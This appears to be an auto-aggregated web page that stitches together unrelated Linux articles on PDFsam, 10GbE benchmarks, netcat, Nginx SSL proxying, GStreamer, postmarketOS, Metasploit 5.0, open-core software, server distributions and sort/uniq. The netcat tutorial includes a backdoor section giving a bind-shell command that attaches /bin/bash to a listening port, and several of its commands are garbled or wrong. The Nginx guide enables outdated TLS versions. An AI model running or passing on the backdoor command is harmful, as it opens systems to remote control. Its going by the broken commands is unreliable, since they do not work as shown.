Download PDF Split and Merge Linux 4.0.1

PDF Split and Merge iconEasy split and merge PDF files on Linux

PDF Split and Merge project is an easy-to-use tool that provides functions to split and merge PDF files or subsections of them.

To install, just unzip the archive into a directory, double click the pdfsam-x.x.jar file or open a terminal a type the following command in the folder where you’ve extracted the archive:

java -jar /pathwhereyouunzipped/pdfsam-x.x.jar

PDF split PDF merge Merge PDF subsection PDF Split Merge Pdfsam

New in PDF Split and Merge 2.2.2:

  • Added recent environments menu
  • New MSI installer suitable for silent and Active Directory installs (feature request #2977478) (bug #3383859)
  • Console: regexp matching on the bookmarks name when splitting by bookmark level
  • Added argument skipGui that can be passed to skip the GUI restore

Read the full changelog

This download is provided to you FREE of charge.

Source

10GbE Linux Networking Performance Between CentOS, Fedora, Clear Linux & Debian

For those curious how the 10 Gigabit Ethernet performance compares between current Linux distributions, here are some benchmarks we ramp up more 10GbE Linux/BSD/Windows benchmarks. This round of testing was done on two distinctly different servers while testing CentOS, Debian, Clear Linux, and Fedora.

This is the first of several upcoming 10GbE test comparisons. For those article we are testing some of the popular enterprise Linux distributions while follow-up articles will also be looking at some other distros as well as Windows Server and FreeBSD/DragonFlyBSD. CentOS 7, Debian 9.6, Clear Linux rolling, and Fedora Server 29 were the operating systems tested for this initial round.

The first server tested was the Dell PowerEdge R7425 with dual AMD EPYC 7601 processors, 512GB of DDR4 system memory, and Samsung 860 500GB SSD. The PowerEdge R7425 server features dual 10GbE RJ45 Ethernet ports using a Broadcom BCM57417 NetXTreme-E 10GBase-T dual-port controller. For this testing a CAT7 cable was connecting the server to the 10GbE switch.

The second server tested was the Tyan S7106 1U server with two Xeon Gold 6138 processors, 96GB of DDR4 memory, Samsung 970 EVO SSD, and for the 10GbE connectivity a PCIe card with QLogic cLOM8214 controller was used while connected via a 10G SPF+ DAC cable. This testing isn’t meant for comparing the performance between these distinctly different servers but rather for looking at the 10GbE performance across the multiple Linux distributions.

All four distributions were cleanly installed on each system and tested in their stock configuration with the default kernels and all stable release updates applied.

The system running all of the server processes for the networking benchmarks was an AMD Ryzen Threadripper 2920X system with Gigabyte X399 AORUS Gaming 7 motherboard, 16GB of RAM, 240GB Corsair Force MP510 NVMe SSD, and using a 10GbE PCIe network card with QLogic cLOM8214 controller. That system was running Ubuntu 18.04 LTS.
Source

NC command (NCAT) for beginners

NC command is for performing maintenance/diagnosis tasks related to network . It can perform operations like read,write or data redirections over the network, similar to how you can use cat command to manipulate files on Linux system. Nc command can be used as a utility to scan ports, monitoring or can also act as a basic TCP proxy.

Organizations can utilize it to review their network security, web servers, telnet servers, mail servers and so on, by checking the ports that are opened and then secure them. NC command can also be used to capture information being sent by system.

Recommended Read : Top 7 commands for Linux Network Traffic Monitoring

Also Read : Important PostgreSQL commands you should know

Now let’s discuss how we can use NC command with some examples,


Examples for NC command


Connect to a remote server

Following example shows how we can connect to remote server with nc command,

$ nc 10.10.10.100 80

here, 10.10.10.100 is IP of the server we want to connect to & 80 is the port number for the remote server. Once connected we can perform some other functions like we can get the total page content with

GET/HTTP/1.1

or fetch page name,

GET/HTTP/1.1

or we can get banner for OS fingerprinting with the following,

HEAD/HTTP/1.1

This will let us know what software & version is being utilised to run the webserver.


Listen to inbound connection requests

To check a server for incoming connection request on a port number, use following example

$ nc -l 8080

Now NC is in listening mode to check port 8080 for incoming connection requests. Now listening mode will keep on running, until terminated manually. But we can address this option ‘w’ for NC,

$ nc -w 10 8080

here, 10 means NC will listen for connections for 10 seconds only.


Connecting to UDP ports

By default, we can connect to TCP ports with NC but to listen to incoming request made to UDP ports we have to use option ‘u’ ,

$ nc -l -u 55


Using NC for Port forwarding

With option ‘c’ of NC, we can redirect a port to another. Complete example is,

$ nc -u -l 8080 -c ‘ nc -u -l 8090’

here, we have forwarded all incoming requests from port 8080 to port 8090.


Using NC as Proxy server

To use NC command as a proxy, use

$ nc – l 8080 | nc 10.10.10.200 80

here, all incoming connections to port 8080 will be diverted to 10.10.10.200 server on port 80.

Now with the above command, we only created a one way passage. To create a return passage or 2 way communication channel, use the following commands,

$ mkfifo 2way

$ nc – l 8080 0<2way | nc 10.10.10.200 80 1>2way

Now you will have the capacity to send and get information over nc proxy.


Using NC as chat tool

Another utility that NC command can serve is as a chat tool. Yes we can also use it as a chat. To create it, first run the following command on one server,

$ nc – l 8080

Than to connect on remote machine, run

$ nc 10.10.10.100 8080

Now we can start conversation using the terminal/CLI.


Using NC to create a system backdoor

Now this one is the most common application of NC & is mostly used by hackers a lot. Basically this creates a backdoor to system which can be exploited by hackers (you should not be doing it, its wrong).
One must be aware of this as to safeguard against this kind of exploits.

Following command can be used to create a backdoor,

$ nc -l 5500 -e /bin/bash

here, we have attached port 5500 to /bin/bash, which can now be connected from a remote machine to execute the commands,

$ nc 10.10.10.100 5500


Force server to remain up

Server will stop listening for connection once a client connection has been terminated. But with option ‘k’, we can force a server to remain running, even when no client is connected.

$ nc -l -k 8080


We now end this tutorial on how to use NC command, please feel free to send in any questions or queries you have regarding this article.

Source

Simple guide to configure Nginx reverse proxy with SSL

A reverse proxy is a server that takes the requests made through web i.e. http & https, then sends them to backend server (or servers). A Backend server can be a single or group of application server like Tomcat, wildfly or Jenkins etc or it can even be another web server like Apache etc.

We have already discussed how we can configure a simple http reverse proxy with Nginx. In this tutorial, we will discuss how we can configure a Nginx reverse proxy with SSL. So let’s start with the procedure to configure Nginx reverse proxy with SSL,

Recommended Read : The (in)complete Guide To DOCKER FOR LINUX

Also Read : Beginner’s guide to SELinux

Pre-requisites

– A backend server: For purpose of this tutorial we are using an tomcat server running on localhost at port 8080. If want to learn how to setup a apache tomcat server, please read this tutorial.

Note:- Make sure that application server is up when you start proxying the requests.

– SSL cert : We would also need an SSL certificate to configure on the server. We can use let’s encrypt certificate, you can get one using the procedure mentioned HERE. But for this tutorial, we will using a self signed certificates, which can be created by running the following command from terminal,

$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/certs/cert.key -out /etc/nginx/certs/cert.crt

You can also read more about self signed certificates HERE.

Next step on configuring nginx reverse proxy with ssl will be nginx installation,


Install Nginx


Ubuntu

Nginx is available with default Ubuntu Repositories. So simple install it using the following command,

$ sudo apt-get update && sudo apt-get install nginx

CentOS/RHEL

We need to add some repos for installing nginx on CentOS & we have created a detailed ARTICLE HERE for nginx installation on CentOS/RHEL.

Now start the services & enable it for boot,

# systemctl start nginx

# systemctl enable nginx

Now to check the nginx installation, we can open web browser & enter the system ip as url to get a default nginx webpage, which confirms that nginx is working fine.


Configuring Nginx reverse proxy with SSL

Now we have all the things we need to configure nginx reverse proxy with ssl. We need to make configurations in nginx now, we will using the default nginx configuration file i.e. ‘/etc/nginx/conf.d/default.conf’.

Assuming this is the first time we are making any changes to configuration, open the file & delete or comment all the old file content, then make the following entries into the file,

# vi /etc/nginx/conf.d/default.conf

server {

listen 80;

return 301 https://$host$request_uri;

}

server {

listen 443;

server_name linuxtechlab.com;

ssl_certificate /etc/nginx/ssl/cert.crt;

ssl_certificate_key /etc/nginx/ssl/cert.key;

ssl on;

ssl_session_cache builtin:1000 shared:SSL:10m;

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;

ssl_prefer_server_ciphers on;

access_log /var/log/nginx/access.log;

location / {

proxy_set_header Host $host;

proxy_set_header X-Real-IP $remote_addr;

proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

proxy_set_header X-Forwarded-Proto $scheme;

proxy_pass http://localhost:8080;

proxy_read_timeout 90;

proxy_redirect http://localhost:8080 https://linuxtechlab.com;

}

}

Once all the changes have been made, save the file & exit. Now before we restart the nginx service to implement the changes made, we will discuss the configuration that we have made , section by section,

Section 1

server {

listen 80;

return 301 https://$host$request_uri;

}

here, we have told that we are to listen to any request made to port 80 & then redirect it to https,

Section 2

listen 443;

server_name linuxtechlab.com;

ssl_certificate /etc/nginx/ssl/cert.crt;

ssl_certificate_key /etc/nginx/ssl/cert.key;

ssl on;

ssl_session_cache builtin:1000 shared:SSL:10m;

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;

ssl_prefer_server_ciphers on;

Now these are some of the default nginx ssl options that we are using, which tells what kind of protocol version, SSL ciphers to support by nginx web server,

Section 3

location / {

proxy_set_header Host $host;

proxy_set_header X-Real-IP $remote_addr;

proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

proxy_set_header X-Forwarded-Proto $scheme;

proxy_pass http://localhost:8080;

proxy_read_timeout 90;

proxy_redirect http://localhost:8080 https://linuxtechlab.com;

}

}

Now this section tells about proxy & where the incoming requests are sent once they come in. Now that we have discussed all the configurations, we will check & then restart the nginx service,

To check the nginx , run the following command,

# nginx -t

Once we have configuration file as OKAY, we will restart the nginx service,

# systemctl restart nginx

That’s it, our nginx reverse proxy with ssl is now ready. Now to test the setup, all you have to do is to open web browser & enter the URL. We should now be redirected to the apache tomcat webpage.

This completes our tutorial on how we can configure nginx reverse proxy with ssl, please do send in any questions or queries regarding this tutorial using the comment box below.

Source

Download GStreamer Linux 1.15.1

GStreamer is an open source library, a complex piece of software that acts as a multimedia framework for numerous GNU/Linux operating systems, as well as Android, OpenBSD, Mac OS X, Microsoft Windows, and Symbian OSes.

Features at a glance

Key features include a comprehensive core library, intelligent plugin architecture, extended coverage of multimedia technologies, as well as extensive development tools, so you can easily add support for GStreamer in your applications.

It is the main multimedia backend for a wide range of open source projects, raging from audio and video playback applications, such as Totem (Videos) from the GNOME desktop environment, and complex video and audio editors.

Additionally, the software features very high performance and low latency, thanks to its extremely lightweight data passing technology, as well as global inter-stream (audio/video) synchronization through clocking.

Comprises of multiple codec packs

The project is comprised of several different packages, also known as code packs, which can be easily installed on any GNU/Linux distribution from their default software repositories all at once or separately. They are as follows: GStreamer Plugins Base, GStreamer Plugins Good, GStreamer Plugins Bad, and GStreamer Plugins Ugly.

GStreamer is a compact core library that allows for random pipleline constructions thanks to its graph-based structure, based on the GLib 2.0 object model library, which can be used for object-oriented design and inheritance.

Uses the QoS (Quality of Service) technology

In order to guarantee the best possible audio and video quality under high CPU load, the project uses QoS (Quality of Service) technology. In addition, it provides transparent and trivial construction of multi-threaded pipelines.

Thanks to its simple, stable and clean API (Application Programming Interface), developers can easily integrate it into their applications, as well as to create plugins that will extend its default functionality. It also provides them with a full featured debugging system.

Bottom line

In conclusion, GStreamer is a very powerful and highly appreciated multimedia framework for the open source ecosystem, providing GNU/Linux users with a wide range of audio and video codecs for media playback and processing.

Source

PostmarketOS brings old Androids back to life with Linux

This week the creators of postmarketOS came out of the shadows to show what they’ve been making for the past year. The software system they’ve created takes old Android devices – and some new – and boots an alternate operating system. This is a Linux distro that boots working software to Android devices that would otherwise be long outside their final official software update.

Before you get too excited about bringing your old smartphone back to life like Frankenstein’s Monster, know that this isn’t for everyone. In fact postmarketOS isn’t built to be used by MOST people. Instead it’s made for hackers, developers, and for those that wish to spend inordinate amounts of time fussing with software code to get their long-since-useful smartphone to a state in which it can do a thing or two.

At some point in the distant future, the creators of postmarketOS hope to develop “a sustainable, privacy and security focused free software mobile OS that is modeled after traditional Linux distributions.” To this end, they’ve got “over 100 booting devices” in a list with instructions how to load. This does not mean that every version WORKS right this minute.

Instead, the list is full of devices on which just a few tiny parts of the phone work. But for those that are super hardcore about loading new and interesting software to their old devices, this might well be enough. Devices from the very well known to the very, very rare are on this list – Fairphone 1 and 2, the Google Glass Explorer Edition, and the original HTC Desire are all here.

Speaking today on Reddit about the future of the project, user “ollieparanoid” suggested that “in the current state, this is aimed at developers, who are both sick of the current state of mobile phone operating systems, and who enjoy contributing to free software projects in their free time and thereby slowly improving the situation.” He added, “If the project should get abandoned at some point, then we still had contributed to other projects by everything we have upstreamed, and you might even benefit from these changes in the future even if you don’t realize it.”

Let us know if you jump in on the party. If you’ve got a device that’s not on the list, let the creators of the software know!

Source

Metasploit, popular hacking and security tool, gets long-awaited update

The open-source Metasploit Framework 5.0 has long been used by hackers and security professionals alike to break into systems. Now, this popular system penetration testing platform, which enables you to find, exploit, and validate security holes, has been given a long-delayed refresh.

Rapid7, Metasploit’s parent company, announced this first major release since 2011. It brings many new features and a fresh release cadence to the program. While the Framework has remained the same for years, the program was kept up to date and useful with weekly module updates.

Also: 7 tips for SMBs to improve data security TechRepublic

These modules contain the latest exploit code for applications, operating systems, and platforms. With these, you can both test your own network and hardware’s security… or attack others. Hackers and security pros alike can also leverage Metasploit Framework’s power to create additional custom security tools or write their own exploit code for new security holes.

With this release, Metasploit has new database and automation application programming interfaces (APIs), evasion modules, and libraries. It also includes expanded language support, improved performance, and ease of use. This, Rapid 7 claims, lays “the groundwork for better teamwork capabilities, tool integration, and exploitation at scale.” That said, if you want an easy-to-use web interface, you need to look to the commercial Metasploit Pro.

Specifically, while Metasploit still uses a Postgresql database backend, you can now run the database as a RESTful service. That enables you to run multiple Metasploit consoles and penetration tools simultaneously.

Metasploit has also opened its APIs to more users. In the past, Metasploit had its own unique APIs and network protocol and it still does. But to make it more accessible, it now has a much more accessible JSON-RPC API.

The Framework also now supports three different module languages: Go, Python, and Ruby. You can use all these to create new evasion modules. Evasion modules can be used to evade antivirus programs.

All modules can also now target multiple targets. Before this, you couldn’t execute an exploit module against multiple hosts at a time. You can now attempt mass attacks without writing a script or manual interaction. You can target multiple hosts by setting RHOSTS to a range of IPs or referencing a hosts file with the file:// option.

Also: The best facial recognition cameras you can buy today CNET

The new Metasploit also improved its module search mechanism. The net result is searching for module is much faster. Modules has also been given new metadata. So, for example, if you want to know if a module leaves artifacts on disk, you can search for it.

In addition, Metasploit’s new metashell feature, enables users to run sessions in the background, upload/download files, or run resource scripts. You could do this earlier, but you needed to upgrade to a Meterpreter session first. Meterpreter combines shell functionality and a Ruby client API. It’s overkill for many users, now that metashell supports more basic functions.

Looking ahead, Metasploit development now has two branches. There’s the 4.x stable branch that underpins Metasploit Pro and open-source projects, such as Kali Linux, ParrotSec Linux, and Metasploit Framework itself, and an unstable branch where core development is done.

Previously, a feature might sit in a pull request for months and still cause bugs when it was released in Kali Linux or Metasploit. Now, with an unstable branch, developers can iterate on features more quickly and thoroughly. The net result is Metasploit will be updated far more quickly going forward.

So, if you want to make sure your systems are locked down tight and as secure as possible, use Metasploit. After all, I can assure you, hackers will be using Metasploit to crack into your company for entirely different reasons.

Related Stories:

Source

Some Thoughts on Open Core

Why open core software is bad for the FOSS movement.

Nothing is inherently anti-business about Free and Open Source
Software (FOSS). In fact, a number of different business
models are built on top of FOSS. The best models are those
that continue to further FOSS by internal code contributions and
that advance the principles of Free Software in general. For instance,
there’s the support model, where a company develops free software
but sells expert support for it.

Here, I’d like to talk a bit about one
of the more problematic models out there, the open core model,
because it’s much more prevalent, and it creates some perverse incentives
that run counter
to Free Software principles.

If you haven’t heard about it, the open core business model is one
where a company develops free software (often a network service
intended to be run on a server) and builds a base set of users and
contributors of that free code base. Once there is a critical mass
of features, the company then starts developing an “enterprise”
version of the product that contains additional features aimed at
corporate use. These enterprise features might include things like
extra scalability, login features like LDAP/Active Directory support
or Single Sign-On (SSO) or third-party integrations, or it might just
be an overall improved version of the product with more code
optimizations and speed.

Because such a company wants to charge customers
to use the enterprise version, it creates a closed fork of the
free software code base, or it might provide the additional proprietary
features as modules so it has fewer problems with violating its
free software license.

The first problem with the open core model is that on its face it
doesn’t further principles behind Free Software, because core developer
time gets focused instead of writing and promoting proprietary
software. Instead of promoting the importance of the freedoms that
Free Software gives both users and developers, these companies often
just use FOSS as a kind of freeware to get an initial base of users
and as free crowdsourcing for software developers that develop the
base product when the company is small and cash-strapped. As the company
get more funding, it’s then able to hire the most active community
developers, so they then can stop working on the community edition and
instead work full-time on the company’s proprietary software.

This brings me to the second problem. The very nature of open core
creates a perverse situation where a company is incentivized to
put developer effort into improving the proprietary product (that
brings in money) and is de-incentivized to move any of those
improvements into the Free Software community edition. After all,
if the community edition gets more features, why would someone pay
for the enterprise edition? As a result, the community edition is
often many steps behind the enterprise edition, if it gets many
updates at all.

All of those productive core developers are instead
working on improving the closed code. The remaining community ends
up making improvements, often as (strangely enough) third-party modules,
because it can be hard to get the company behind an open core project
to accept modules that compete with its enterprise features.

What’s worse is that a lot of the so-called “enterprise” features
end up being focused on speed optimizations or basic security
features like TLS support—simple improvements you’d want in the
free software version. These speed or security improvements never
make their way into the community edition, because the company intends that only individuals will use that version.

The message from the company
is clear: although the company may support free software on its face
(at the beginning), it believes that free software is for hobbyists
and proprietary software is for professionals.

The final problem with the open core model is that after these
startups move to the enterprise phase and start making money, there
is zero incentive to start any new free software projects within
the company. After all, if a core developer comes up with a great
idea for an improvement or a new side project, that could be something
the company could sell, so it winds up under the proprietary software
“enterprise” umbrella.

Ultimately, the open core model is a version of Embrace, Extend
and Extinguish made famous by Microsoft, only designed for VC-backed
startups. The model allows startups to embrace FOSS when they are
cash- and developer-strapped to get some free development and users
for their software. The moment they have a base product that can
justify the next round of VC funding, they move from embracing to
extending the free “core” to add proprietary enterprise software.
Finally, the free software core gets slowly extinguished. Improvements
and new features in the core product slow to a trickle, as the
proprietary enterprise product gets the majority of developer time
and the differences between the two versions become too difficult
to reconcile. The free software version becomes a kind of freeware
demo for enterprise users to try out before they get the “real”
version. Finally, the community edition lags too far behind and is
abandoned by the company as it tries to hit the profitability phase
of its business and no longer can justify developer effort on
free software. Proprietary software wins, Free Software loses.

Source

Top 5 Linux Server Distributions | Linux.com

Ah, the age-old question: Which Linux distribution is best suited for servers? Typically, when this question is asked, the standard responses pop up:

  • RHEL
  • SUSE
  • Ubuntu Server
  • Debian
  • CentOS

However, in the name of opening your eyes to maybe something a bit different, I’m going to approach this a bit differently. I want to consider a list of possible distributions that are not only outstanding candidates but also easy to use, and that can serve many functions within your business. In some cases, my choices are drop-in replacements for other operating systems, whereas others require a bit of work to get them up to speed.

Some of my choices are community editions of enterprise-grade servers, which could be considered gateways to purchasing a much more powerful platform. You’ll even find one or two entries here to be duty-specific platforms. Most importantly, however, what you’ll find on this list isn’t the usual fare.

ClearOS

What is ClearOS? For home and small business usage, you might not find a better solution. Out of the box, ClearOS includes tools like intrusion detection, a strong firewall, bandwidth management tools, a mail server, a domain controller, and much more. What makes ClearOS stand out above some of the competition is its purpose is to server as a simple Home and SOHO server with a user-friendly, graphical web-based interface. From that interface, you’ll find an application marketplace (Figure 1), with hundreds of apps (some of which are free, whereas some have an associated cost), that makes it incredibly easy to extend the ClearOS featureset. In other words, you make ClearOS the platform your home and small business needs it to be. Best of all, unlike many other alternatives, you only pay for the software and support you need.

There are three different editions of ClearOS:

To make the installation of software even easier, the ClearOS marketplace allows you to select via:

  • By Function (which displays apps according to task)
  • By Category (which displays groups of related apps)
  • Quick Select File (which allows you to select pre-configured templates to get you up and running fast)

In other words, if you’re looking for a Linux Home, SOHO, or SMB server, ClearOS is an outstanding choice (especially if you don’t have the Linux chops to get a standard server up and running).

Fedora Server

You’ve heard of Fedora Linux. Of course you have. It’s one of the finest bleeding edge distributions on the market. But did you know the developers of that excellent Fedora Desktop distribution also has a Server edition? The Fedora Server platform is a short-lifecycle, community-supported server OS. This take on the server operating system enables seasoned system administrators, experienced with any flavor of Linux (or any OS at all), to make use of the very latest technologies available in the open source community. There are three key words in that description:

  • Seasoned
  • System
  • Administrators

In other words, new users need not apply. Although Fedora Server is quite capable of handling any task you throw at it, it’s going to require someone with a bit more Linux kung fu to make it work and work well. One very nice inclusion with Fedora Server is that, out of the box, it includes one of the finest open source, web-based interface for servers on the market. With Cockpit (Figure 2) you get a quick glance at system resources, logs, storage, network, as well as the ability to manage accounts, services, applications, and updates.

If you’re okay working with bleeding edge software, and want an outstanding admin dashboard, Fedora Server might be the platform for you.

NethServer

NethServer is about as no-brainer of a drop-in SMB Linux server as you’ll find. With the latest iteration of NethServer, your small business will enjoy:

  • Built-in Samba Active Directory Controller
  • Seamless Nextcloud integration
  • Certificate management
  • Transparent HTTPS proxy
  • Firewall
  • Mail server and filter
  • Web server and filter
  • Groupware
  • IPS/IDS or VPN

All of the included features can be easily configured with a user-friendly, web-based interface that includes single-click installation of modules to expand the NethServer feature set (Figure 3) What sets NethServer apart from ClearOS is that it was designed to make the admin job easier. In other words, this platform offers much more in the way of flexibility and power. Unlike ClearOS, which is geared more toward home office and SOHO deployments, NethServer is equally at home in small business environments.

Rockstor

Rockstor is a Linux and Btfrs powered advanced Network Attached Storage (NAS) and Cloud storage server that can be deployed for Home, SOHO, as well as small- and mid-sized businesses alike. With Rockstor, you get a full-blown NAS/Cloud solution with a user-friendly, web-based GUI tool that is just as easy for admins to set up as it is for users to use. Once you have Rockstor deployed, you can create pools, shares, snapshots, manage replication and users, share files (with the help of Samba, NFS, SFTP, and AFP), and even extend the featureset, thanks to add-ons (called Rock-ons). The list of Rock-ons includes:

  • CouchPotato (Downloader for usenet and bittorrent users)
  • Deluge (Movie downloader for bittorrent users)
  • EmbyServer (Emby media server)
  • Ghost (Publishing platform for professional bloggers)
  • GitLab CE (Git repository hosting and collaboration)
  • Gogs Go Git Service (Lightweight Git version control server and front end)
  • Headphones (An automated music downloader for NZB and Torrent)
  • Logitech Squeezebox Server for Squeezebox Devices
  • MariaDB (Relational database management system)
  • NZBGet (Efficient usenet downloader)
  • OwnCloud-Official (Secure file sharing and hosting)
  • Plexpy (Python-based Plex Usage tracker)
  • Rocket.Chat (Open Source Chat Platform)
  • SaBnzbd (Usenet downloader)
  • Sickbeard (Internet PVR for TV shows)
  • Sickrage (Automatic Video Library Manager for TV Shows)
  • Sonarr (PVR for usenet and bittorrent users)
  • Symform (Backup service)

Rockstor also includes an at-a-glance dashboard that gives admins quick access to all the information they need about their server (Figure 4).

Zentyal

Zentyal is another Small Business Server that does a great job of handling multiple tasks. If you’re looking for a Linux distribution that can handle the likes of:

  • Directory and Domain server
  • Mail server
  • Gateway
  • DHCP, DNS, and NTP server
  • Certification Authority
  • VPN
  • Instant Messaging
  • FTP server
  • Antivirus
  • SSO authentication
  • File sharing
  • RADIUS
  • Virtualization Management
  • And more

Zentyal might be your new go-to. Zentyal has been around since 2004 and is based on Ubuntu Server, so it enjoys a rock-solid base and plenty of applications. And with the help of the Zentyal dashboard (Figure 5), admins can easily manage:

  • System
  • Network
  • Logs
  • Software updates and installation
  • Users/groups
  • Domains
  • File sharing
  • Mail
  • DNS
  • Firewall
  • Certificates
  • And much more

Adding new components to the Zentyal server is as simple as opening the Dashboard, clicking on Software Management > Zentyal Components, selecting what you want to add, and clicking Install. The one issue you might find with Zentyal is that it doesn’t offer nearly the amount of addons as you’ll find in the likes of Nethserver and ClearOS. But the services it does offer, Zentyal does incredibly well.

Plenty More Where These Came From

This list of Linux servers is clearly not exhaustive. What it is, however, is a unique look at the top five server distributions you’ve probably not heard of. Of course, if you’d rather opt to use a more traditional Linux server distribution, you can always stick with CentOS, Ubuntu Server, SUSE, Red Hat Enterprise Linux, or Debian… most of which are found on every list of best server distributions on the market. If, however, you’re looking for something a bit different, give one of these five distos a try.

Learn more about Linux through the free “Introduction to Linux” course from The Linux Foundation and edX.

Source

Back to Basics: Sort and Uniq | Linux.com

""

Learn the fundamentals of sorting and de-duplicating text on the command line.

If you’ve been using the command line for a long time, it’s easy to take the commands you use every day for granted. But, if you’re new to the Linux command line, there are several commands that make your life easier that you may not stumble upon automatically. In this article, I cover the basics of two commands that are essential in anyone’s arsenal: sort and uniq.

The sort command does exactly what it says: it takes text data as input and outputs sorted data. There are many scenarios on the command line when you may need to sort output, such as the output from a command that doesn’t offer sorting options of its own (or the sort arguments are obscure enough that you just use the sort command instead). In other cases, you may have a text file full of data (perhaps generated with some other script), and you need a quick way to view it in a sorted form.

Let’s start with a file named “test” that contains three lines:


Foo
Bar
Baz

sort can operate either on STDIN redirection, the input from a pipe, or, in the case of a file, you also can just specify the file on the command. So, the three following commands all accomplish the same thing:


cat test | sort
sort < test
sort test

And the output that you get from all of these commands is:


Bar
Baz
Foo

Sorting Numerical Output

Now, let’s complicate the file by adding three more lines:


Foo
Bar
Baz
1. ZZZ
2. YYY
11. XXX

If you run one of the above sort commands again, this time, you’ll see different output:


11. XXX
1. ZZZ
2. YYY
Bar
Baz
Foo

This is likely not the output you wanted, but it points out an important fact about sort. By default, it sorts alphabetically, not numerically. This means that a line that starts with “11.” is sorted above a line that starts with “1.”, and all of the lines that start with numbers are sorted above lines that start with letters.

To sort numerically, pass sort the -n option:


sort -n test

Bar
Baz
Foo
1. ZZZ
2. YYY
11. XXX

Find the Largest Directories on a Filesystem

Numerical sorting comes in handy for a lot of command-line output—in particular, when your command contains a tally of some kind, and you want to see the largest or smallest in the tally. For instance, if you want to find out what files are using the most space in a particular directory and you want to dig down recursively, you would run a command like this:


du -ckx

This command dives recursively into the current directory and doesn’t traverse any other mountpoints inside that directory. It tallies the file sizes and then outputs each directory in the order it found them, preceded by the size of the files underneath it in kilobytes. Of course, if you’re running such a command, it’s probably because you want to know which directory is using the most space, and this is where sortcomes in:


du -ckx | sort -n

Now you’ll get a list of all of the directories underneath the current directory, but this time sorted by file size. If you want to get even fancier, pipe its output to the tail command to see the top ten. On the other hand, if you wanted the largest directories to be at the top of the output, not the bottom, you would add the-r option, which tells sort to reverse the order. So to get the top ten (well, top eight—the first line is the total, and the next line is the size of the current directory):


du -ckx | sort -rn | head

This works, but often people using the du command want to see sizes in more readable output than kilobytes. The du command offers the -h argument that provides “human-readable” output. So, you’ll see output like 9.6G instead of 10024764 with the -k option. When you pipe that human-readable output to sort though, you won’t get the results you expect by default, as it will sort 9.6G above 9.6K, which would be above 9.6M.

The sort command has a -h option of its own, and it acts like -n, but it’s able to parse standard human-readable numbers and sort them accordingly. So, to see the top ten largest directories in your current directory with human-readable output, you would type this:


du -chx | sort -rh | head

Removing Duplicates

The sort command isn’t limited to sorting one file. You might pipe multiple files into it or list multiple files as arguments on the command line, and it will combine them all and sort them. Unfortunately though, if those files contain some of the same information, you will end up with duplicates in the sorted output.

To remove duplicates, you need the uniq command, which by default removes any duplicate lines that are adjacent to each other from its input and outputs the results. So, let’s say you had two files that were different lists of names:


cat namelist1.txt
Jones, Bob
Smith, Mary
Babbage, Walter

cat namelist2.txt
Jones, Bob
Jones, Shawn
Smith, Cathy

You could remove the duplicates by piping to uniq:


sort namelist1.txt namelist2.txt | uniq
Babbage, Walter
Jones, Bob
Jones, Shawn
Smith, Cathy
Smith, Mary

The uniq command has more tricks up its sleeve than this. It also can output only the duplicated lines, so you can find duplicates in a set of files quickly by adding the -d option:


sort namelist1.txt namelist2.txt | uniq -d
Jones, Bob

You even can have uniq provide a tally of how many times it has found each entry with the -c option:


sort namelist1.txt namelist2.txt | uniq -c
1 Babbage, Walter
2 Jones, Bob
1 Jones, Shawn
1 Smith, Cathy
1 Smith, Mary

As you can see, “Jones, Bob” occurred the most times, but if you had a lot of lines, this sort of tally might be less useful for you, as you’d like the most duplicates to bubble up to the top. Fortunately, you have the sort command:


sort namelist1.txt namelist2.txt | uniq -c | sort -nr
2 Jones, Bob
1 Smith, Mary
1 Smith, Cathy
1 Jones, Shawn
1 Babbage, Walter

Conclusion

I hope these cases of using sort and uniq with realistic examples show you how powerful these simple command-line tools are. Half the secret with these foundational command-line tools is to discover (and remember) they exist so that they’ll be at your command the next time you run into a problem they can solve.

Source

WP2Social Auto Publish Powered By : XYZScripts.com